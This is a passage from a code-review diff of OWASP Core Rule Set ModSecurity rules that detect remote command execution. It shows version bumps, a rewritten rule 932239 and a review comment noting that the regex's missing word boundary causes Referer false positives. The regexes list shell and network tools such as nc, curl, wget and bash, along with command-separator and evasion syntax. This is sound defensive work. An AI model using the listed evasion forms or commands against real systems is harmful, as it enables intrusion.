:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#
\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|tobm)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:t[\s\x0b&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|f|hclient|m(?:esg|idecode|se
tup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<>\|]|ing)|a(?:n
o[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[23]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:datectl|out[\s\x0b&\)<>\|]))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\)<>\|]|diff)|e
w[\s\x0b&\)<>\|]|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:c|a(?:ll|tch)[\s\x0b&\)<>\|]|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))" \ "id:932239,\ phase:1,\ block,\ @@ -611,7 +611,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\) tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
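Review bot: The rewritten 932239 pattern (L115–L119) still ends at `|run|ypper))"` with no trailing `\b`, so a benign Referer query string such as `?sort=topic` or `?filter=identity` satisfies it: `=` is in the separator class `[\n\r;=`\{]`, nothing is required between it and the command list, and entries like `i(?:d|…)`, `t(?:…o(?:p|…)…)`, `w(?:c|…)` and `d(?:…|f|…)` carry no terminator, unlike the sibling 932232 at L125 which closes with `\b`. The only functional change I can see against the removed line (L110–L114) is the `$[` form added to the separator group, `\$(?:\(\(?|[\[\{])` (L116); the rest looks byte-identical. Whether the missing boundary is an accepted PL2 tradeoff upstream I cannot tell from the hunk; if it is, the PR description should say operators can expect Referer false positives from this rule at PL2, and if it is not, the fix is an explicit terminator on those entries in the regex-assembly source this line is generated from, since a hand edit here would be lost on the next sync. The 932239 directive starts at L114 and its action list continues past this hunk.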
@@ -631,13 +631,13 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-she tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\
)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\
$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))\b" \ +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]